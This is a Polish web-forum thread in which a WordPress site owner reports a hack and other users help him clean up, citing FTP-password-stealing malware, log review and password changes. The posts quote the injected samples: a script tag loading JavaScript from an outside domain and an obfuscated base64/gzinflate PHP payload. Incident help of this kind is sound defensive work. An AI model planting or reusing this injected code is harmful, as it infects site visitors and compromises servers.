Skocz do zawartości
Gość bolek10

Włamanie ?

Polecane posty

Gość bolek10

Witam, dzisiaj odkryłem włamanie na moją strone.

Strona stoi na skrypcie Word Press.

Dzisiaj wchodząc na nią odkryłem nieprzyjemny komunikat o zablkokowaniu tej strony;/

 

Sprawdziłem i został doklejony kod:

 

<!--pizda--><script type=text/javascript src=http://paysafecard.name/analitics.js?ftpid=47217></script><!--/pizda-->

Co on mógł zrobić? Jak zabezpieczyć skrypt?

Używam filezilli do połączeń ftp, na innych stronach raczej nic nie zauważyłem.

Wtyczki które używam:

All in One SEO Pack

Contact Form 7

Google Analyticator

Google XML Sitemaps

 

TEn kod już usunąłem z plików .php, czy to wystarczy?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Pewnie nie wystarczy bo jak raz Ci to wgrali to i wgrają po raz drugi, trzeba było sprawdzić daty modyfikacji plików a potem logi ftp-a i http w tym czasie żeby namierzyć którędy to się dostało.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Na wordpressa jest exploit, mało osób go ma/zna bo nie ma on statusu public.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość bolek10

Namierzyłem ten kod również na innej stronce, co teraz zrobić aby tego się pozbyć?

To siedzi u mnie na kompie czy ktoś ma dostęp do serwera?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Namierzyłem ten kod również na innej stronce, co teraz zrobić aby tego się pozbyć?

To siedzi u mnie na kompie czy ktoś ma dostęp do serwera?

 

Nie masz kodu źródłowego tego pliku:

http://paysafecard.name/analitics.js?ftpid=47217

?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Wordpress mimo, że bardzo popularny to jednak nadal bardzo dziurawy skrypt. Włamania tego typu to włamania spowodowane dziurami w oprogramowaniu, nie są spowodowane złym zabezpieczeniem serwera. Ważne jest aby na bieżąco go aktualizować, możesz zmienić też login ze standardowego "admin" na coś innego. Aby pozbyć się wirusa nadpisz instalację wordpressa (oczywiście bez pliku wp-config.php) i/lub nadpisz wszystkie biblioteki js wtyczek.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Następna złota rada. Nadpisze pliki i co dalej? Za tydzień znowu mu się ktoś włamie bo nie znajdzie przyczyny.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość bolek10

Na innych stronach znalazłem również inne niespodzianki, np.

#d93065#

echo(gzinflate(base64_decode("3U5LDsIgFLwKeZvqphjdKXAKL4AUy2sQyOvD2ttL7S2c1WQyPyH+A2p2hIUFr8VrYP9hOdm33VUwQ3b15RP3CyH7Q6fwSfblxUxOQ2AuVykpx3VaY09VulwTX059CQVEakYN9wWZPYFolTlGTKMGWzmD+DU9Mg2eNKQm2Ihj0uDa3hYIHsfAGs4gFhw4bMwouT8w3fGm5H7TfAE=")));

#/d93065#

 

Patrzyłem na daty modyfikacji plików, później w logi.

Ktoś logował się do ftp z kilku ip, w różne dni.

Co dziwne, są przypadki że w jednej minucie w ftp siedzą 2-3 osoby.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Wcale wordpress nie jest taki dziurawy. Exploit był ale już nie działa.

Pozmieniaj hasła.

 

Jest i działa ale nie public.

 

Jeśli chodzi o włamanie. Przeanalizowałem kodzik i wywnioskuje tak:

Ściągnąłeś złośliwe oprogramowaniem, które rozszyfrowało zapisane na twoim komputerze hasła do serwerów FTP, połączyło się z nimi, a następnie dokleiło do plików index złośliwy JavaScript, który próbuje infekować internautów wirusami, utrzymać access w celu wykonania deface lub użycie serwera do ataków DDoS (dodanie do botneta). Radziłbym formacik i zmianę haseł.

Edytowano przez kcp (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość bolek10

Jest i działa ale nie public.

 

Jeśli chodzi o włamanie. Przeanalizowałem kodzik i wywnioskuje tak:

Ściągnąłeś złośliwe oprogramowaniem, które rozszyfrowało zapisane na twoim komputerze hasła do serwerów FTP, połączyło się z nimi, a następnie dokleiło do plików index złośliwy JavaScript, który próbuje infekować internautów wirusami, utrzymać access w celu wykonania deface lub użycie serwera do ataków DDoS (dodanie do botneta). Radziłbym formacik i zmianę haseł.

Co do wirusa to bardzo możliwe gdyż używam winXP bez zabezpieczeń, system zaraz reinstaluję ale na ubuntu/debiana bo dosyć już mam tych winszitów.

Dziękuję wszystkim za pomoc ;)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Co do wirusa to bardzo możliwe gdyż używam winXP bez zabezpieczeń, system zaraz reinstaluję ale na ubuntu/debiana bo dosyć już mam tych winszitów.

Dziękuję wszystkim za pomoc wink.png

Sądząc po podejściu do zabezpieczeń (świadome używanie systemu sprzed paru lat bez zabezpieczeń) na Linuxie prędzej czy później sam sobie dołek wykopiesz ;)

 

 

A na przyszlosc- nie zapisuj hasel w zadnych programach tylko uzywaj KeePass'a i w nim chowaj loginy/hasla i zabezpiecz dostep do bazy silnym haslem + plikiem kluczowym.

  • Upvote 1

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się


×